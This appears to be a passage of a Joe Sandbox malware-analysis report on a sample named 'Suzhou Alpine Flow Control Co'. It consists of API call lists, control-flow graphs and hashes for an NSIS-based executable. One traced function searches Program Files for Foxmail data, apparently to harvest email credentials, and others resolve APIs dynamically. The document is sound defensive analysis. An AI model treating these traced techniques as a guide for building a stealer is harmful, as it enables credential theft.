335656d0 _free 8906->8912 8907 3356570e 8935 33566368 8907->8935 8909 335656f9 RtlAllocateHeap 8910 3356570c 8909->8910 8909->8912 8910->8885 8911 3356474f _free 7 API calls 8911->8912 8912->8907 8912->8909 8912->8911 8914 335635f2 RaiseException 8913->8914 8914->8888 8917 3356479f ___DestructExceptionObject 8916->8917 8929 33565671 RtlEnterCriticalSection 8917->8929 8919 335647aa 8930 335647dc 8919->8930 8921 335647d1 _abort 8921->8905 8923 33562ae5 IsProcessorFeaturePresent 8922->8923 8924 33562ae3 8922->8924 8926 33562b58 8923->8926 8924->8904 8934 33562b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8926->8934 8928 33562c3b 8928->8904 8929->8919 8933 335656b9 RtlLeaveCriticalSection 8930->8933 8932 335647e3 8932->8921 8933->8932 8934->8928 8938 33565b7a GetLastError 8935->8938 8939 33565b93 8938->8939 8940 33565b99 8938->8940 8957 33565e08 8939->8957 8944 33565bf0 SetLastError 8940->8944 8964 3356637b 8940->8964 8947 33565bf9 8944->8947 8945 33565bb3 8971 3356571e 8945->8971 8947->8910 8950 33565bcf 8984 3356593c 8950->8984 8951 33565bb9 8952 33565be7 SetLastError 8951->8952 8952->8947 8955 3356571e _free 17 API calls 8956 33565be0 8955->8956 8956->8944 8956->8952 8989 33565c45 8957->8989 8959 33565e2f 8960 33565e47 TlsGetValue 8959->8960 8961 33565e3b 8959->8961 8960->8961 8962 33562ada _ValidateLocalCookies 5 API calls 8961->8962 8963 33565e58 8962->8963 8963->8940 8969 33566388 _free 8964->8969 8965 335663c8 8968 33566368 _free 19 API calls 8965->8968 8966 335663b3 RtlAllocateHeap 8967 33565bab 8966->8967 8966->8969 8967->8945 8977 33565e5e 8967->8977 8968->8967 8969->8965 8969->8966 8970 3356474f _free 7 API calls 8969->8970 8970->8969 8972 33565729 HeapFree 8971->8972 8976 33565752 _free 8971->8976 8973 3356573e 8972->8973 8972->8976 8974 33566368 _free 18 API calls 8973->8974 8975 33565744 GetLastError 8974->8975 8975->8976 8976->8951 8978 33565c45 _free 5 API calls 8977->8978 8979 33565e85 8978->8979 8980 33565e94 8979->8980 8981 33565ea0 TlsSetValue 8979->8981 8982 33562ada _ValidateLocalCookies 5 API calls 8980->8982 8981->8980 8983 33565bc8 8982->8983 8983->8945 8983->8950 8995 33565914 8984->8995 8993 33565c71 8989->8993 8994 33565c75 __crt_fast_encode_pointer 8989->8994 8990 33565c95 8992 33565ca1 GetProcAddress 8990->8992 8990->8994 8991 33565ce1 _free LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 8991->8993 8992->8994 8993->8990 8993->8991 8993->8994 8994->8959 8996 33565854 _free RtlEnterCriticalSection RtlLeaveCriticalSection 8995->8996 8997 33565938 8996->8997 8998 335658c4 8997->8998 8999 33565758 _free 20 API calls 8998->8999 9000 335658e8 8999->9000 9000->8955 9002 33561ca6 _strlen 9001->9002 9002->8897 8745 3356c7a7 8746 3356c7be 8745->8746 8755 3356c82c 8745->8755 8746->8755 8757 3356c7e6 GetModuleHandleA 8746->8757 8747 3356c835 GetModuleHandleA 8750 3356c83f 8747->8750 8748 3356c872 8752 3356c85f GetProcAddress 8750->8752 8750->8755 8751 3356c7dd 8751->8750 8753 3356c800 GetProcAddress 8751->8753 8751->8755 8752->8755 8754 3356c80d VirtualProtect 8753->8754 8753->8755 8754->8755 8756 3356c81c VirtualProtect 8754->8756 8755->8747 8755->8748 8755->8750 8756->8755 8758 3356c7ef 8757->8758 8765 3356c82c 8757->8765 8769 3356c803 GetProcAddress 8758->8769 8760 3356c7f4 8763 3356c800 GetProcAddress 8760->8763 8760->8765 8761 3356c835 GetModuleHandleA 8767 3356c83f 8761->8767 8762 3356c872 8764 3356c80d VirtualProtect 8763->8764 8763->8765 8764->8765 8766 3356c81c VirtualProtect 8764->8766 8765->8761 8765->8762 8765->8767 8766->8765 8767->8765 8768 3356c85f GetProcAddress 8767->8768 8768->8765 8770 3356c82c 8769->8770 8771 3356c80d VirtualProtect 8769->8771 8773 3356c835 GetModuleHandleA 8770->8773 8774 3356c872 8770->8774 8771->8770 8772 3356c81c VirtualProtect 8771->8772 8772->8770 8775 3356c83f 8773->8775 8775->8770 8776 3356c85f GetProcAddress 8775->8776 8776->8775

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 33561137
                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 33561151
                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3356115C
                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3356116D
                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3356117C
                                                                                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 33561193
                                                                                                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 335611D0
                                                                                                    • FindClose.KERNEL32(00000000), ref: 335611DB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3448925785.0000000033561000.00000040.00001000.00020000.00000000.sdmp, Offset: 33560000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3448907864.0000000033560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3448925785.0000000033576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_33560000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                    • String ID:
                                                                                                    • API String ID: 1083526818-0
                                                                                                    • Opcode ID: ed33922f73c48288d2beefe8ab7929793464ec676469dee6a51afb9cc538cb97
                                                                                                    • Instruction ID: 6e414736e8effeeebe3dce284aba53f34778d887926a9e24e8f394bfc989d28e
                                                                                                    • Opcode Fuzzy Hash: ed33922f73c48288d2beefe8ab7929793464ec676469dee6a51afb9cc538cb97
                                                                                                    • Instruction Fuzzy Hash: AD2185719043486BD710EA64DC48F9B7BECEF84324F040D2AF998E3190FB74D6058796

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 33561434
                                                                                                      • Part of subcall function 335610F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 33561137
                                                                                                      • Part of subcall function 335610F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 33561151
                                                                                                      • Part of subcall function 335610F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3356115C
                                                                                                      • Part of subcall function 335610F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3356116D
                                                                                                      • Part of subcall function 335610F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3356117C
                                                                                                      • Part of subcall function 335610F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 33561193
                                                                                                      • Part of subcall function 335610F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 335611D0
                                                                                                      • Part of subcall function 335610F1: FindClose.KERNEL32(00000000), ref: 335611DB
                                                                                                    • lstrlenW.KERNEL32(?), ref: 335614C5
                                                                                                    • lstrlenW.KERNEL32(?), ref: 335614E0
                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 3356150F
                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 33561521
                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 33561547
                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 33561553
                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 33561579
                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 33561585
                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 335615AB
                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 335615B7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3448925785.0000000033561000.00000040.00001000.00020000.00000000.sdmp, Offset: 33560000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3448907864.0000000033560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3448925785.0000000033576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_33560000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                    • String ID: )$Foxmail$ProgramFiles
                                                                                                    • API String ID: 672098462-2938083778
                                                                                                    • Opcode ID: 63b1f8583650d1ade684c33e9c1d6980efda60f73b64d979b4ab3b347d5dc0dd
                                                                                                    • Instruction ID: 77c46be0c32c41d2649d54d4a81651325fc8b3a0f731238afb2deff59552ed61
                                                                                                    • Opcode Fuzzy Hash: 63b1f8583650d1ade684c33e9c1d6980efda60f73b64d979b4ab3b347d5dc0dd
                                                                                                    • Instruction Fuzzy Hash: 7981B0B1A00358AADB20DBA1EC85FEE737DEF84714F001596F908E7190EAB15B84CF95

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(3356C7DD), ref: 3356C7E6
                                                                                                    • GetModuleHandleA.KERNEL32(?,3356C7DD), ref: 3356C838
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 3356C860
                                                                                                      • Part of subcall function 3356C803: GetProcAddress.KERNEL32(00000000,3356C7F4), ref: 3356C804
                                                                                                      • Part of subcall function 3356C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,3356C7F4,3356C7DD), ref: 3356C816
                                                                                                      • Part of subcall function 3356C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,3356C7F4,3356C7DD), ref: 3356C82A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3448925785.0000000033561000.00000040.00001000.00020000.00000000.sdmp, Offset: 33560000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3448907864.0000000033560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3448925785.0000000033576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_33560000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 2099061454-0
                                                                                                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                    • Instruction ID: 1cdcd398ca0a89e17e45b6855688585a3770a3167d2dd6af334a51b5de977a56
                                                                                                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                    • Instruction Fuzzy Hash: 15014150A4534038FB3052B83C00ABA6FAC9B636ACB983B96E040DB493C9A4C502C3F6

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 80 3356c7a7-3356c7bc 81 3356c7be-3356c7c6 80->81 82 3356c82d 80->82 81->82 84 3356c7c8-3356c7f6 call 3356c7e6 81->84 83 3356c82f-3356c833 82->83 85 3356c835-3356c83d GetModuleHandleA 83->85 86 3356c872 call 3356c877 83->86 91 3356c86c 84->91 92 3356c7f8 84->92 90 3356c83f-3356c847 85->90 90->90 93 3356c849-3356c84c 90->93 96 3356c86d-3356c86e 91->96 94 3356c7fa-3356c7fc 92->94 95 3356c85b-3356c85e 92->95 93->83 97 3356c84e-3356c850 93->97 94->96 98 3356c7fe 94->98 101 3356c85f-3356c860 GetProcAddress 95->101 99 3356c866-3356c86b 96->99 100 3356c870 96->100 102 3356c856-3356c85a 97->102 103 3356c852-3356c854 97->103 104 3356c865 98->104 105 3356c800-3356c80b GetProcAddress 98->105 99->91 100->93 101->104 102->95 103->101 104->99 105->82 106 3356c80d-3356c81a VirtualProtect 105->106 107 3356c82c 106->107 108 3356c81c-3356c82a VirtualProtect 106->108 107->82 108->107
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(?,3356C7DD), ref: 3356C838
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 3356C860
                                                                                                      • Part of subcall function 3356C7E6: GetModuleHandleA.KERNEL32(3356C7DD), ref: 3356C7E6
                                                                                                      • Part of subcall function 3356C7E6: GetProcAddress.KERNEL32(00000000,3356C7F4), ref: 3356C804
                                                                                                      • Part of subcall function 3356C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,3356C7F4,3356C7DD), ref: 3356C816
                                                                                                      • Part of subcall function 3356C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,3356C7F4,3356C7DD), ref: 3356C82A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3448925785.0000000033561000.00000040.00001000.00020000.00000000.sdmp, Offset: 33560000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3448907864.0000000033560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3448925785.0000000033576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_33560000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 2099061454-0
                                                                                                    • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                    • Instruction ID: 6308bf315cd1eff6202b15e04a166f3ba218d963394e3a587cf1915bb8227ddd
                                                                                                    • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                    • Instruction Fuzzy Hash: 992138654083816FF7318B786C047A67FE89F572A8F5C3696D040CB143D5A88445C3F2

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 109 3356c803-3356c80b GetProcAddress 110 3356c82d 109->110 111 3356c80d-3356c81a VirtualProtect 109->111 114 3356c82f-3356c833 110->114 112 3356c82c 111->112 113 3356c81c-3356c82a VirtualProtect 111->113 112->110 113->112 115 3356c835-3356c83d GetModuleHandleA 114->115 116 3356c872 call 3356c877 114->116 118 3356c83f-3356c847 115->118 118->118 119 3356c849-3356c84c 118->119 119->114 120 3356c84e-3356c850 119->120 121 3356c856-3356c85e 120->121 122 3356c852-3356c854 120->122 123 3356c85f-3356c865 GetProcAddress 121->123 122->123 126 3356c866-3356c86e 123->126 129 3356c870 126->129 129->119
                                                                                                    APIs
                                                                                                    • GetProcAddress.KERNEL32(00000000,3356C7F4), ref: 3356C804
                                                                                                    • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,3356C7F4,3356C7DD), ref: 3356C816
                                                                                                    • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,3356C7F4,3356C7DD), ref: 3356C82A
                                                                                                    • GetModuleHandleA.KERNEL32(?,3356C7DD), ref: 3356C838
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 3356C860
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3448925785.0000000033561000.00000040.00001000.00020000.00000000.sdmp, Offset: 33560000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3448907864.0000000033560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3448925785.0000000033576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_33560000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                    • String ID:
                                                                                                    • API String ID: 2152742572-0
                                                                                                    • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                    • Instruction ID: 2f16b3ea6b757d8ef84f537afc05005a85fdbbff846aa3eeaa147a8dc6e7565a
                                                                                                    • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                    • Instruction Fuzzy Hash: 22F0F095A893403CFA3145B83C45EBA5FDC8B676A8B583B56E144CB183D8A9850683F6

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 190 404bb0-404bfc GetDlgItem * 2 191 404c02-404c96 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 190->191 192 404e1d-404e24 190->192 193 404ca5-404cac DeleteObject 191->193 194 404c98-404ca3 SendMessageW 191->194 195 404e26-404e36 192->195 196 404e38 192->196 198 404cae-404cb6 193->198 194->193 197 404e3b-404e44 195->197 196->197 199 404e46-404e49 197->199 200 404e4f-404e55 197->200 201 404cb8-404cbb 198->201 202 404cdf-404ce3 198->202 199->200 204 404f33-404f3a 199->204 207 404e64-404e6b 200->207 208 404e57-404e5e 200->208 205 404cc0-404cdd call 405fae SendMessageW * 2 201->205 206 404cbd 201->206 202->198 203 404ce5-404d11 call 40419a * 2 202->203 246 404d17-404d1d 203->246 247 404ddc-404def GetWindowLongW SetWindowLongW 203->247 212 404fab-404fb3 204->212 213 404f3c-404f42 204->213 205->202 206->205 209 404ee0-404ee3 207->209 210 404e6d-404e70 207->210 208->204 208->207 209->204 223 404ee5-404eef 209->223 218 404e72-404e79 210->218 219 404e7b-404e90 call 404afe 210->219 215 404fb5-404fbb SendMessageW 212->215 216 404fbd-404fc4 212->216 221 405193-4051a5 call 404201 213->221 222 404f48-404f52 213->222 215->216 226 404fc6-404fcd 216->226 227 404ff8-404fff 216->227 218->209 218->219 219->209 245 404e92-404ea3 219->245 222->221 230 404f58-404f67 SendMessageW 222->230 224 404ef1-404efd SendMessageW 223->224 225 404eff-404f09 223->225 224->225 225->204 233 404f0b-404f15 225->233 234 404fd6-404fdd 226->234 235 404fcf-404fd0 ImageList_Destroy 226->235 238 405155-40515c 227->238 239 405005-405011 call 4011ef 227->239 230->221 240 404f6d-404f7e SendMessageW 230->240 241 404f26-404f30 233->241 242 404f17-404f24 233->242 243 404fe6-404ff2 234->243 244 404fdf-404fe0 GlobalFree 234->244 235->234 238->221 251 40515e-405165 238->251 264 405021-405024 239->264 265 405013-405016 239->265 249 404f80-404f86 240->249 250 404f88-404f8a 240->250 241->204 242->204 243->227 244->243 245->209 253 404ea5-404ea7 245->253 254 404d20-404d27 246->254 252 404df5-404df9 247->252 249->250 256 404f8b-404fa4 call 401299 SendMessageW 249->256 250->256 251->221 257 405167-405191 ShowWindow GetDlgItem ShowWindow 251->257 258 404e13-404e1b call 4041cf 252->258 259 404dfb-404e0e ShowWindow call 4041cf 252->259 260 404ea9-404eb0 253->260 261 404eba 253->261 262 404dbd-404dd0 254->262 263 404d2d-404d55 254->263 256->212 257->221 258->192 259->221 271 404eb2-404eb4 260->271 272 404eb6-404eb8 260->272 275 404ebd-404ed9 call 40117d 261->275 262->254 279 404dd6-404dda 262->279 273 404d57-404d8d SendMessageW 263->273 274 404d8f-404d91 263->274 267 405065-405089 call 4011ef 264->267 268 405026-40503f call 4012e2 call 401299 264->268 276 405018 265->276 277 405019-40501c call 404b7e 265->277 292 40512b-40513f InvalidateRect 267->292 293 40508f 267->293 298 405041-405047 268->298 299 40504f-40505e SendMessageW 268->299 271->275 272->275 273->262 280 404d93-404da2 SendMessageW 274->280 281 404da4-404dba SendMessageW 274->281 275->209 276->277 277->264 279->247 279->252 280->262 281->262 292->238 295 405141-405150 call 404ad1 call 404ab9 292->295 296 405092-40509d 293->296 295->238 300 405113-405125 296->300 301 40509f-4050ae 296->301 302 405049 298->302 303 40504a-40504d 298->303 299->267 300->292 300->296 305 4050b0-4050bd 301->305 306 4050c1-4050c4 301->306 302->303 303->298 303->299 305->306 307 4050c6-4050c9 306->307 308 4050cb-4050d4 306->308 310 4050d9-405111 SendMessageW * 2 307->310 308->310 311 4050d6 308->311 310->300 311->310
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404BC8
                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404BD3
                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404C1D
                                                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404C30
                                                                                                    • SetWindowLongW.USER32(?,000000FC,004051A8), ref: 00404C49
                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C5D
                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404C6F
                                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404C85
                                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C91
                                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404CA3
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00404CA6
                                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404CD1
                                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404CDD
                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D73
                                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D9E
                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404DB2
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404DE1
                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404DEF
                                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404E00
                                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404EFD
                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404F62
                                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404F77
                                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F9B
                                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404FBB
                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404FD0
                                                                                                    • GlobalFree.KERNEL32(?), ref: 00404FE0
                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405059
                                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00405102
                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405111
                                                                                                    • InvalidateRect.USER32(?,00000000,?), ref: 00405131
                                                                                                    • ShowWindow.USER32(?,00000000), ref: 0040517F
                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 0040518A
                                                                                                    • ShowWindow.USER32(00000000), ref: 00405191
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                    • String ID: $M$N
                                                                                                    • API String ID: 1638840714-813528018
                                                                                                    • Opcode ID: 5536270c612583b56431b6cecbe513891586c3f04ea08752845fd7aab356c235
                                                                                                    • Instruction ID: 03f87516f98afcaf774383f7594fe685c09e1d2031758133a9bfc9c340c12758
                                                                                                    • Opcode Fuzzy Hash: 5536270c612583b56431b6cecbe513891586c3f04ea08752845fd7aab356c235
                                                                                                    • Instruction Fuzzy Hash: 2E026DB0A00209EFEB209F54DD85AAE7BB5FB44354F10857AF610BA2E1C7789D52CF58

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 312 40335a-4033f2 #17 SetErrorMode OleInitialize call 4062f6 SHGetFileInfoW call 405f8c GetCommandLineW call 405f8c GetModuleHandleW 319 4033f4-4033f6 312->319 320 4033fb-40340f call 405a04 CharNextW 312->320 319->320 323 40350a-403510 320->323 324 403414-40341a 323->324 325 403516 323->325 326 403423-40342a 324->326 327 40341c-403421 324->327 328 40352a-403544 GetTempPathW call 403326 325->328 330 403432-403436 326->330 331 40342c-403431 326->331 327->326 327->327 335 403546-403564 GetWindowsDirectoryW lstrcatW call 403326 328->335 336 40359c-4035b6 DeleteFileW call 402dbc 328->336 333 4034f7-403506 call 405a04 330->333 334 40343c-403442 330->334 331->330 333->323 352 403508-403509 333->352 338 403444-40344b 334->338 339 40345c-403495 334->339 335->336 355 403566-403596 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403326 335->355 357 403667-403676 call 40382d OleUninitialize 336->357 358 4035bc-4035c2 336->358 345 403452 338->345 346 40344d-403450 338->346 340 4034b2-4034ec 339->340 341 403497-40349c 339->341 349 4034f4-4034f6 340->349 350 4034ee-4034f2 340->350 341->340 347 40349e-4034a6 341->347 345->339 346->339 346->345 353 4034a8-4034ab 347->353 354 4034ad 347->354 349->333 350->349 356 403518-403525 call 405f8c 350->356 352->323 353->340 353->354 354->340 355->336 355->357 356->328 368 403772-403778 357->368 369 40367c-40368c call 405768 ExitProcess 357->369 361 403657-403663 call 40391f 358->361 362 4035c8-4035d3 call 405a04 358->362 361->357 375 403621-40362b 362->375 376 4035d5-40360a 362->376 373 403815-40381d 368->373 374 40377e-40379b call 4062f6 * 3 368->374 381 403823-403827 ExitProcess 373->381 382 40381f 373->382 404 4037e5-4037f3 call 4062f6 374->404 405 40379d-40379f 374->405 379 403692-4036ac lstrcatW lstrcmpiW 375->379 380 40362d-40363b call 405adf 375->380 377 40360c-403610 376->377 385 403612-403617 377->385 386 403619-40361d 377->386 379->357 388 4036ae-4036c4 CreateDirectoryW SetCurrentDirectoryW 379->388 380->357 395 40363d-403653 call 405f8c * 2 380->395 382->381 385->386 390 40361f 385->390 386->377 386->390 392 4036d1-4036fa call 405f8c 388->392 393 4036c6-4036cc call 405f8c 388->393 390->375 403 4036ff-40371b call 405fae DeleteFileW 392->403 393->392 395->361 413 40375c-403764 403->413 414 40371d-40372d CopyFileW 403->414 416 403801-40380c ExitWindowsEx 404->416 417 4037f5-4037ff 404->417 405->404 408 4037a1-4037a3 405->408 408->404 415 4037a5-4037b7 GetCurrentProcess 408->415 413->403 419 403766-40376d call 405e26 413->419 414->413 418 40372f-40374f call 405e26 call 405fae call 405703 414->418 415->404 427 4037b9-4037db 415->427 416->373 421 40380e-403810 call 40140b 416->421 417->416 417->421 418->413 434 403751-403758 CloseHandle 418->434 419->357 421->373 427->404 434->413
                                                                                                    APIs
                                                                                                    • #17.COMCTL32 ref: 00403379
                                                                                                    • SetErrorMode.KERNEL32(00008001), ref: 00403384
                                                                                                    • OleInitialize.OLE32(00000000), ref: 0040338B
                                                                                                      • Part of subcall function 004062F6: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 00406308
                                                                                                      • Part of subcall function 004062F6: LoadLibraryA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 00406313
                                                                                                      • Part of subcall function 004062F6: GetProcAddress.KERNEL32(00000000,?), ref: 00406324
                                                                                                    • SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 004033B3
                                                                                                      • Part of subcall function 00405F8C: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F99
                                                                                                    • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 004033C8
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 004033DB
                                                                                                    • CharNextW.USER32(00000000,00434000,00000020), ref: 00403403
                                                                                                    • GetTempPathW.KERNEL32(00000400,00436800,00000000,?), ref: 0040353B
                                                                                                    • GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 0040354C
                                                                                                    • lstrcatW.KERNEL32(00436800,\Temp), ref: 00403558
                                                                                                    • GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp), ref: 0040356C
                                                                                                    • lstrcatW.KERNEL32(00436800,Low), ref: 00403574
                                                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 00403585
                                                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 0040358D
                                                                                                    • DeleteFileW.KERNEL32(00436000), ref: 004035A1
                                                                                                    • OleUninitialize.OLE32(?), ref: 0040366C
                                                                                                    • ExitProcess.KERNEL32 ref: 0040368C
                                                                                                    • lstrcatW.KERNEL32(00436800,~nsu.tmp,00434000,00000000,?), ref: 00403698
